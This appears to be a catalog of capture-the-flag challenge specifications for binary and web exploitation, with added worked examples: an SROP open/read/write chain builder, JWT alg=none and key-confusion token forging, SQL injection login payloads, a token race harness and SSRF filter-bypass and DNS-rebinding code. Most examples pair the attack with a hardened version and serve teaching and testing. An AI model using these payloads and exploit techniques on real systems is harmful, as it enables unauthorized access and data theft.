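Two practical notes: mixing non-positional `%64c` with positional `%9$hn` is technically undefined but is what glibc accepts and what pwntools' `fmtstr_payload` emits; and because each %hn stores the running output count, the chunks are written in ascending order so no single padding exceeds 65535 characters.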
Leak addresses
Format Strings
“Binary passes user input directly as the format string, printf(user_input). Leak stack and libc addresses.”
Tcache double-free poisoning
Heap Exploits
Exploit a tcache double-free to corrupt the free-list fd pointer, redirecting a subsequent malloc() to an attacker-chosen address. Write a function pointer there to call win().
Use-after-free
Heap Exploits
“Menu-based allocator with use-after-free allowing overwrite of function pointer.”
Integer overflow
Logic Bugs
“Integer overflow in a length calculation allows a buffer overflow.”
Off-by-one
Logic Bugs
“Off-by-one overwrites the null terminator, leading to control.”
Signedness issue
Logic Bugs
“Signed integer used as unsigned index.”
Type confusion
Logic Bugs
"Type confusion via out-of-bounds negative index dispatches wrong function pointer (win)."
Seccomp bypass
Sandbox Escape
“Simulate seccomp by manually filtering allowed commands; bypass via logic bug.”
Sigreturn-oriented programming (SROP)
Sandbox Escape
"Minimal ROP: only syscall+pop_rax gadgets. Craft sigreturn frame to call open/read/write."
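The sigreturn frame the SROP entry above asks for, as an added example (not the challenge's own solver): the 31-slot x86-64 frame in the order rt_sigreturn reads it from RSP (struct ucontext, then the saved registers in sigcontext order, then the signal mask; the same table pwntools' SigreturnFrame uses), a builder that fills it, and a three-step open/read/write chain where each frame's rsp points at the next step and rip at a syscall;ret gadget. Gadget addresses, the "flag\0" string address, the scratch buffer, the address at which the chain lands and the assumption that open() returns fd 3 are all hypothetical.

```python
import struct

# Slots of the x86-64 sigreturn frame exactly as rt_sigreturn reads them from
# RSP: struct ucontext (flags, link, altstack) then the saved registers in
# sigcontext order, then the signal mask. 31 slots x 8 bytes = 248 bytes.
FRAME_FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "reserved", "sigmask",
]
SYS_READ, SYS_WRITE, SYS_OPEN, SYS_RT_SIGRETURN = 0, 1, 2, 15


def frame_offset(field: str) -> int:
    return 8 * FRAME_FIELDS.index(field)


def build_frame(**regs) -> bytes:
    unknown = set(regs) - set(FRAME_FIELDS)
    if unknown:
        raise ValueError("not frame fields: %s" % sorted(unknown))
    values = dict.fromkeys(FRAME_FIELDS, 0)
    values["csgsfs"] = 0x33           # user-mode CS selector; zero faults on return
    values.update(regs)
    return b"".join(struct.pack("<Q", values[f]) for f in FRAME_FIELDS)


def parse_frame(blob: bytes) -> dict:
    if len(blob) != 8 * len(FRAME_FIELDS):
        raise ValueError("frame must be %d bytes" % (8 * len(FRAME_FIELDS)))
    return dict(zip(FRAME_FIELDS, struct.unpack("<%dQ" % len(FRAME_FIELDS), blob)))


def srop_syscall(pop_rax_ret: int, syscall_ret: int, nr: int, next_rsp: int,
                 rdi: int = 0, rsi: int = 0, rdx: int = 0) -> bytes:
    """One SROP step: ret into pop rax (rax <- 15), ret into syscall, and the
    kernel loads our frame. The frame's rip is `syscall; ret`, so the real
    syscall `nr` runs and the ret continues the chain at `next_rsp`."""
    frame = build_frame(rax=nr, rdi=rdi, rsi=rsi, rdx=rdx, rsp=next_rsp, rip=syscall_ret)
    return struct.pack("<QQQ", pop_rax_ret, SYS_RT_SIGRETURN, syscall_ret) + frame


# Constructed, hypothetical addresses for a non-PIE binary.
POP_RAX_RET = 0x401136
SYSCALL_RET = 0x40113F
FLAG_PATH = 0x404100   # "flag\0" already placed here by an earlier read
SCRATCH = 0x404200     # where read() drops the file contents
CHAIN_AT = 0x404300    # address at which the chain bytes land (leaked or pivoted to)
STEP = 24 + 8 * len(FRAME_FIELDS)   # bytes per step: 3 gadget words + frame


def open_read_write_chain() -> bytes:
    """open("flag") -> fd 3 (stdin/out/err are open), read(3, buf), write(1, buf)."""
    chain = srop_syscall(POP_RAX_RET, SYSCALL_RET, SYS_OPEN, CHAIN_AT + STEP,
                         rdi=FLAG_PATH, rsi=0)
    chain += srop_syscall(POP_RAX_RET, SYSCALL_RET, SYS_READ, CHAIN_AT + 2 * STEP,
                          rdi=3, rsi=SCRATCH, rdx=0x100)
    chain += srop_syscall(POP_RAX_RET, SYSCALL_RET, SYS_WRITE, 0,
                          rdi=1, rsi=SCRATCH, rdx=0x100)  # crash after output is fine
    return chain


if __name__ == "__main__":
    for reg in ("rdi", "rsi", "rdx", "rax", "rsp", "rip", "csgsfs"):
        print("%-6s at frame+%#x" % (reg, frame_offset(reg)))
    print("chain length:", len(open_read_write_chain()))
```

The chain is only self-consistent if the bytes really land at CHAIN_AT, because every frame's rsp hard-codes where the next pop rax word sits; on a stack-based overflow that address comes from a leak, otherwise the first step must pivot into a known writable buffer.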
Canary bypass
Stack Exploits
“Binary includes stack canary; leak via format string, then overflow.”
One-gadget libc exploit
Stack Exploits
Leak a libc address via a format string primitive, compute the libc base, and redirect execution to a one_gadget — a single address in libc that spawns a shell when register constraints are met.
PIE leak + ROP
Stack Exploits
"Round 1: format string leaks code pointer → compute PIE base. Round 2: BOF → ROP to win()."
Ret2libc
Stack Exploits
“Enable NX, disable PIE, leak libc address via printf, require ret2libc to call system.”
ROP chain
Stack Exploits
“Binary must require a ROP chain to call win() or system(). Provide a clear leak primitive.”
Shellcode injection (executable stack)
Stack Exploits
Inject and execute shellcode directly on the stack (NX disabled). The binary reads user input into an executable stack buffer and jumps to it. Easy variant prints the buffer and win() addresses.
Simple buffer overflow
Stack Exploits
“Generate a C binary with classic stack overflow (gets or vulnerable scanf). Compile with -fno-stack-protector -no-pie. Flag printed via hidden function.”
Stack pivot via leave;ret gadget
Stack Exploits
The overflow is limited to 8 bytes past saved RBP — not enough for a full ROP chain. Plant a ROP chain in a global BSS buffer (via an unlimited first read), then use a leave;ret gadget to pivot RSP into it.
CORS misconfiguration
Access Control
Exploit a CORS misconfiguration to steal data cross-origin.
GraphQL overexposure
Access Control
Exploit an over-exposed GraphQL schema to extract sensitive data.
Hidden admin endpoint
Access Control
Discover a hidden admin endpoint to access privileged functionality.
Horizontal privilege escalation
Access Control
Escalate horizontally to access another user's account data.
IDOR (numeric)
Access Control
Exploit numeric IDOR to access another user's private data.
IDOR (UUID guessable)
Access Control
Predict a guessable UUID to access unauthorized resources.
Mass assignment
Access Control
Exploit mass assignment to set privileged fields on a user object.
Multi-tenant data leak
Access Control
Exploit a multi-tenant isolation flaw to access another tenant's data.
Parameter pollution IDOR
Access Control
Use HTTP parameter pollution to bypass access control checks.
REST verb confusion
Access Control
Use HTTP verb confusion to bypass authorization on a REST endpoint.
Role misassignment
Access Control
Exploit a role misassignment vulnerability to gain elevated permissions.
Vertical privilege escalation
Access Control
Escalate privileges vertically to gain admin-level access.
X-Forwarded-For bypass
Access Control
Player receives an HTTP exchange artifact and must manipulate the X-Forwarded-For header to bypass IP-based access control.
API key leakage
API
Leak API key in JS bundle or debug endpoint; key grants access to /admin/flag.
Batch endpoint abuse
API
Abuse a batch API endpoint to exfiltrate bulk sensitive data.
Pagination bypass
API
Manipulate pagination parameters to access out-of-bounds records.
Rate limit bypass
API
Bypass rate limiting to perform unrestricted brute-force or enumeration.
Swagger exposed secrets
API
Expose /swagger or /openapi.json containing hidden admin endpoints or example API keys that lead to the flag.
2FA logic flaw
Authentication
Exploit a two-factor authentication logic flaw to skip verification.
Account lockout bypass
Authentication
Bypass an account lockout mechanism to authenticate as admin.
Blind SQLi login
Authentication
Exploit blind SQL injection in a login form to bypass authentication.
Boolean-based auth flaw
Authentication
Exploit a boolean-based authentication logic flaw to gain access.
Cookie tampering
Authentication
Tamper with a predictable cookie value to escalate privileges.
CSRF token forgery
Authentication
Player receives a CSRF token artifact and must understand why the token is predictable or mis-scoped to complete the attack.
Email verification bypass
Authentication
Bypass email verification logic to access a restricted account.
GraphQL token abuse
Authentication
Player receives a GraphQL bearer token artifact and must decode or forge the token to access privileged queries.
HMAC secret brute force
Authentication
Brute force a weak HMAC secret to forge authentication cookies.
Insecure remember-me token
Authentication
Exploit a predictable remember-me token to bypass authentication.
JWT alg=none
Authentication
Forge a JWT by exploiting the algorithm=none vulnerability.
JWT key confusion
Authentication
Exploit RS256/HS256 algorithm confusion to forge a valid JWT.
JWT kid injection
Authentication
Inject a malicious kid header to forge a trusted JWT token.
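A verifier that shows why the alg=none and RS256/HS256 key-confusion entries above work, as an added example that is not the challenge platform's code. The public-key PEM and the HMAC secret are constructed placeholders (the PEM is not a real key: under key confusion the attacker only needs the exact bytes the server holds, and those are public by design), and the RS256 signature path is deliberately absent because both attacks are accepted before it would run.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed placeholders; the PEM is not a real key.
PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                  b"CONSTRUCTED/PLACEHOLDER/NOT/A/REAL/RSA/KEY==\n"
                  b"-----END PUBLIC KEY-----\n")
HMAC_SECRET = b"hypothetical-32-byte-hmac-secret-value!!"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def hs256(key: bytes, signing_input: str) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def make_token(header: dict, claims: dict, key: bytes = b"") -> str:
    """Attacker-side minting: alg=none gets an empty signature, HS256 gets an
    HMAC under whatever bytes we choose as the key."""
    signing_input = segment(header) + "." + segment(claims)
    if header["alg"] == "none":
        return signing_input + "."
    return signing_input + "." + b64url(hs256(key, signing_input))


def verify_vulnerable(token: str, key: bytes) -> dict:
    """The bug: the algorithm is read from the attacker-controlled header and the
    one configured `key` is handed to whichever branch that selects."""
    h, c, s = token.split(".")
    header, claims = json.loads(b64url_decode(h)), json.loads(b64url_decode(c))
    alg = header.get("alg")
    if alg == "none":
        return claims                           # no signature checked at all
    if alg == "HS256":
        if hmac.compare_digest(hs256(key, h + "." + c), b64url_decode(s)):
            return claims                       # `key` may be the RSA public key
        raise ValueError("bad signature")
    raise ValueError("RS256 verification omitted here; neither attack reaches it")


def verify_hardened(token: str, key: bytes, expected_alg: str) -> dict:
    """The algorithm is pinned by server configuration, never taken from the
    token, and an HMAC branch refuses anything that looks like a public key."""
    if expected_alg not in ("HS256", "RS256"):
        raise ValueError("unsupported configured algorithm")
    h, c, s = token.split(".")
    header, claims = json.loads(b64url_decode(h)), json.loads(b64url_decode(c))
    if header.get("alg") != expected_alg:
        raise ValueError("alg mismatch: token says %r, config says %r"
                         % (header.get("alg"), expected_alg))
    if expected_alg == "RS256":
        raise NotImplementedError("RSA verification is out of scope for this example")
    if b"-----BEGIN" in key or len(key) < 32:
        raise ValueError("HS256 needs a dedicated high-entropy secret, not a PEM")
    if not hmac.compare_digest(hs256(key, h + "." + c), b64url_decode(s)):
        raise ValueError("bad signature")
    if claims.get("exp", 0) < time.time():
        raise ValueError("expired")
    return claims


def accepted(verify, *args) -> bool:
    try:
        verify(*args)
        return True
    except (ValueError, NotImplementedError):
        return False


ADMIN_CLAIMS = {"sub": "attacker", "role": "admin", "exp": 4102444800}  # 2100-01-01
NONE_TOKEN = make_token({"alg": "none", "typ": "JWT"}, ADMIN_CLAIMS)
CONFUSED_TOKEN = make_token({"alg": "HS256", "typ": "JWT"}, ADMIN_CLAIMS, PUBLIC_KEY_PEM)
LEGIT_TOKEN = make_token({"alg": "HS256", "typ": "JWT"}, ADMIN_CLAIMS, HMAC_SECRET)

if __name__ == "__main__":
    print("vulnerable accepts alg=none:", accepted(verify_vulnerable, NONE_TOKEN, PUBLIC_KEY_PEM))
    print("vulnerable accepts HS256(pem):", accepted(verify_vulnerable, CONFUSED_TOKEN, PUBLIC_KEY_PEM))
    print("hardened accepts either:", accepted(verify_hardened, NONE_TOKEN, PUBLIC_KEY_PEM, "RS256")
          or accepted(verify_hardened, CONFUSED_TOKEN, PUBLIC_KEY_PEM, "RS256"))
```

The hardened path matters for the key-confusion entry in particular: an RS256 deployment that pins `expected_alg` rejects the HS256 token at the alg comparison, before the public key could ever be used as an HMAC secret, and the PEM check stops an HS256 deployment from being misconfigured with a public key in the first place.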
Login bypass (SQLi simple)
Authentication
“Vulnerable login uses string-concatenated SQL. Provide /login + /flag gated by auth. Deterministic bypass with ' OR 1=1--.”
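The deterministic bypass named in the spec above, as an added example (not the generated challenge itself): the string-concatenated query beside its parameterised replacement, run against an in-memory SQLite table. The table, the account and the stored password are constructed, and a real application would store a password hash rather than the plaintext used here to keep the example short.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    con.execute("INSERT INTO users VALUES (?, ?)", ("admin", "correct-horse-battery-staple"))
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """String-concatenated query: user input becomes SQL syntax. Returns the
    authenticated username or None."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the driver passes values separately from the SQL
    text, so quotes and comment markers in the input can never alter the
    statement's structure."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Classic payloads, both entered in the username field. The first makes the
# WHERE clause always true and comments out the password comparison; the
# second closes the string after a chosen account name and comments out the rest.
ALWAYS_TRUE = "' OR 1=1--"
TARGET_ADMIN = "admin'--"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, ALWAYS_TRUE, "anything"))
    print("safe:      ", login_safe(con, ALWAYS_TRUE, "anything"))
```

With `' OR 1=1--` the executed statement is `SELECT username FROM users WHERE username = '' OR 1=1--' AND password = 'anything'`; everything after `--` is a comment, so the first row of the table comes back and the caller treats it as a successful login.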
OAuth misconfiguration
Authentication
Exploit an OAuth misconfiguration to steal user access tokens.
Open redirect → OAuth token theft
Authentication
Chain an open redirect with OAuth to steal an authorization token.
OTP reuse
Authentication
Exploit one-time password reuse to authenticate without valid credentials.
PASETO weak key
Authentication
Player receives a PASETO token with a weak or deterministic symmetric key and must forge a token with elevated claims.
Password reset token predictability
Authentication
Predict a password reset token to take over a victim account.
Refresh token no expiry
Authentication
Player receives a refresh token that never expires and must exploit the lack of rotation/expiry to elevate privileges.
SAML signature bypass
Authentication
Bypass SAML signature validation to forge an authentication assertion.
Session fixation
Authentication
Exploit session fixation to hijack an authenticated user session.
Session hijacking
Authentication
Steal and replay a session token to access a protected account.
Weak password policy exploit
Authentication
Exploit a weak password policy to brute-force the admin account.
Coupon stacking
Business Logic
Stack coupons beyond the intended limit to unlock the flag reward.
Double-spend
Business Logic
Exploit a double-spend vulnerability in a credit balance system.
Feature flag abuse
Business Logic
Abuse a feature flag to enable a hidden admin-only capability.
Logic-based privilege escalation
Business Logic
Exploit application logic flaws to escalate to admin privileges.
Order status tampering
Business Logic
Tamper with order status transitions to unlock a restricted flag.
Payment bypass
Business Logic
Bypass a payment flow to access a premium feature without paying.
Quantity manipulation
Business Logic
Manipulate order quantities to access premium features for free.
Race condition
Business Logic
Win a race condition to bypass a one-time-use token check.
TOCTOU
Business Logic
Exploit a time-of-check/time-of-use flaw to access restricted data.
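The race condition and TOCTOU entries above share one mechanism, shown here as an added example that is not part of the challenge platform: a one-time token store whose check and consumption are separated by a delay, hammered by twenty threads released at the same instant, beside a store that consumes the token atomically before doing any slow work. The token value, the thread count and the 50 ms delay standing in for a database or HTTP round trip are constructed.

```python
import threading
import time


class RacyTokenStore:
    """Check-then-use with a gap: every thread that reads 'still valid' before
    the first one removes the token gets to redeem it."""

    def __init__(self, tokens):
        self._valid = set(tokens)

    def redeem(self, token: str) -> bool:
        if token not in self._valid:      # time of check
            return False
        time.sleep(0.05)                  # simulated DB/HTTP round trip
        self._valid.discard(token)        # time of use
        return True


class AtomicTokenStore:
    """Consume first, under a lock, so the check and the removal cannot interleave."""

    def __init__(self, tokens):
        self._valid = set(tokens)
        self._lock = threading.Lock()

    def redeem(self, token: str) -> bool:
        with self._lock:
            if token not in self._valid:
                return False
            self._valid.discard(token)    # gone before any other thread looks
        time.sleep(0.05)                  # slow work after consumption is harmless
        return True


def hammer(store, token: str, workers: int = 20) -> int:
    """Release `workers` redemptions of the same token at once; return how many
    the store accepted. A one-time token must give exactly 1."""
    results = []
    gate = threading.Barrier(workers)

    def worker():
        gate.wait()
        results.append(store.redeem(token))

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


if __name__ == "__main__":
    print("racy store accepted:  ", hammer(RacyTokenStore(["tok-1"]), "tok-1"))
    print("atomic store accepted:", hammer(AtomicTokenStore(["tok-1"]), "tok-1"))
```

Against a database the equivalent of the lock is a single conditional write, for example `UPDATE tokens SET used = 1 WHERE id = ? AND used = 0` followed by a check that exactly one row changed; over HTTP the equivalent of `hammer` is a batch of identical requests released together (last-byte synchronisation or a single-packet attack).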
Archive bomb (simulated)
File Handling
Analyze a simulated archive bomb to safely extract the flag inside.
Content-type bypass
File Handling
Manipulate Content-Type headers to bypass upload restrictions.
Extension bypass
File Handling
Bypass file extension filtering to upload a malicious file.
Insecure deserialization (generic)
File Handling
Exploit insecure deserialization to achieve remote code execution.
PHAR deserialization (simulated)
File Handling
Trigger a PHP PHAR deserialization gadget to execute code.
Pickle deserialization
File Handling
Exploit Python pickle deserialization to execute arbitrary code.
Prototype pollution (Node)
File Handling
Pollute JavaScript object prototypes to bypass security checks.
Unrestricted file upload
File Handling
Upload a web shell by bypassing file type restrictions.
YAML unsafe load
File Handling
Exploit YAML unsafe deserialization to execute arbitrary commands.
ZIP slip
File Handling
Exploit ZIP path traversal to overwrite files outside the target directory.
Argument injection
Injection
Inject extra arguments into a spawned command to read protected files.
Command injection
Injection
Inject shell commands through an unsanitized input to get the flag.
LDAP injection
Injection
Inject LDAP filter syntax to bypass authentication or leak data.
LFI
Injection
Exploit local file inclusion to read the flag from the filesystem.
NoSQL injection
Injection
Inject NoSQL operators to bypass authentication and extract data.
Path traversal
Injection
Traverse the filesystem using ../ sequences to read the flag file.
RFI
Injection
Exploit remote file inclusion to load and execute a remote payload.
SQL injection (classic)
Injection
Exploit classic SQL injection to extract the flag from the database.
SQLi blind time-based
Injection
Use time-based blind SQL injection to extract the flag character by character.
SQLi second order
Injection
Exploit second-order SQL injection triggered by stored user input.
SSTI chain
Injection
Chain multiple SSTI steps to achieve remote code execution.
SSTI to RCE chain
Injection
Chain SSTI with code execution to achieve full RCE and read the flag.
Template injection (Jinja2/Twig)
Injection
Exploit server-side template injection to execute code and get the flag.
Basic SSRF
SSRF
Exploit SSRF to make the server fetch internal resources.
DNS rebinding (simulated)
SSRF
Exploit simulated DNS rebinding to bypass the SSRF host check: the hostname resolves to a public address when validated and to an internal one when fetched.
Gopher SSRF
SSRF
Use Gopher protocol SSRF to interact with internal TCP services.
SSRF → internal admin
SSRF
Use SSRF to reach an internal admin panel and extract the flag.
SSRF → Redis (mocked)
SSRF
Chain SSRF with Gopher to send commands to an internal Redis instance.
SSRF filter bypass
SSRF
Bypass SSRF protections using URL encoding or redirect tricks.
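The filter-bypass entry above and the DNS-rebinding entry earlier in this category fail for two different reasons, shown together in this added example (not the challenge platform's code): a naive hostname blocklist that alternate IP spellings walk past, beside a validator that canonicalises the host the way the kernel will, rejects every internal range with the ipaddress module, and resolves DNS exactly once so the fetcher connects to the checked address. The blocklist, the public address 11.22.33.44 and the flip-flop resolver standing in for an attacker's zero-TTL name are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Naive blocklist of the kind the filter-bypass challenge expects you to defeat.
BLOCKLIST = {"localhost", "127.0.0.1", "169.254.169.254", "metadata.google.internal"}


def is_allowed_naive(url: str) -> bool:
    host = (urlsplit(url).hostname or "").lower()
    return host not in BLOCKLIST


def canonical_ip(host: str):
    """The address the kernel would actually connect to for a numeric host:
    dotted quad, IPv6 literal, or the inet_aton spellings (127.1, 0x7f000001,
    2130706433). Returns None when `host` is a name that needs DNS."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            ip = ipaddress.ip_address(socket.inet_aton(host))
        except OSError:
            return None
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 reaches 127.0.0.1
    return ip


def is_internal(ip) -> bool:
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved
            or ip.is_multicast or ip.is_unspecified)


def resolve_target(url: str, resolver):
    """Validate `url` and return the literal (ip, port) the fetcher must connect
    to. DNS is consulted exactly once, here; connecting to the returned IP with
    the original Host header is what closes the rebinding window."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("unsupported URL")
    ip = canonical_ip(parts.hostname)
    if ip is None:
        ip = ipaddress.ip_address(resolver(parts.hostname))
    if is_internal(ip):
        raise ValueError("%s resolves to internal address %s" % (parts.hostname, ip))
    return str(ip), parts.port or (443 if parts.scheme == "https" else 80)


def is_allowed_hardened(url: str, resolver) -> bool:
    try:
        resolve_target(url, resolver)
        return True
    except ValueError:
        return False


def fetch_target_vulnerable(url: str, resolver) -> str:
    """Check, then resolve again at fetch time: the gap a rebinding attack uses."""
    host = urlsplit(url).hostname
    if is_internal(ipaddress.ip_address(resolver(host))):   # time of check
        raise ValueError("blocked")
    return resolver(host)                                   # time of use


def rebinding_resolver(first: str, then: str):
    """Constructed DNS stand-in: answers `first` once, then `then` forever,
    which is how an attacker-controlled name with a zero TTL behaves."""
    answers = [first]

    def resolve(_name: str) -> str:
        return answers.pop(0) if answers else then

    return resolve


if __name__ == "__main__":
    public_dns = lambda name: "11.22.33.44"
    for url in ("http://127.1/", "http://0x7f000001/", "http://2130706433/",
                "http://[::ffff:127.0.0.1]/", "http://169.254.169.254/latest/meta-data/"):
        print("%-45s naive=%-5s hardened=%s" % (url, is_allowed_naive(url),
                                                 is_allowed_hardened(url, public_dns)))
    flip = rebinding_resolver("11.22.33.44", "127.0.0.1")
    print("vulnerable fetch connects to", fetch_target_vulnerable("http://evil.example/", flip))
```

The hardened validator still has to be paired with a fetcher that honours it: if the HTTP client is handed the original URL it will resolve the name a second time and follow redirects on its own, so the client must be given the checked IP and told not to follow redirects (or re-run `resolve_target` on every hop).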
SSRF to metadata (mocked)
SSRF
Use SSRF to access the mocked cloud instance metadata endpoint.
SSRF via PDF renderer
SSRF
Exploit a PDF renderer to perform SSRF against internal services.
SSRF via webhook
SSRF
Exploit a webhook URL parameter to pivot SSRF into internal networks.
AngularJS expression injection
XSS
Inject AngularJS template expressions to execute arbitrary JavaScript.
CSP bypass
XSS
Bypass Content Security Policy to execute a malicious XSS payload.
DOM-based XSS
XSS
Exploit DOM-based XSS to execute JavaScript in the victim's browser.
File upload XSS
XSS
Upload a malicious file to trigger stored XSS in the admin panel.
Markdown rendering XSS
XSS
Exploit unsafe Markdown rendering to inject and execute XSS.
Reflected XSS
XSS
Inject a reflected XSS payload to steal the admin's session cookie.
Service worker abuse
XSS
Register a malicious service worker to intercept user requests.
Stored XSS
XSS
Plant a stored XSS payload to exfiltrate the admin's cookie.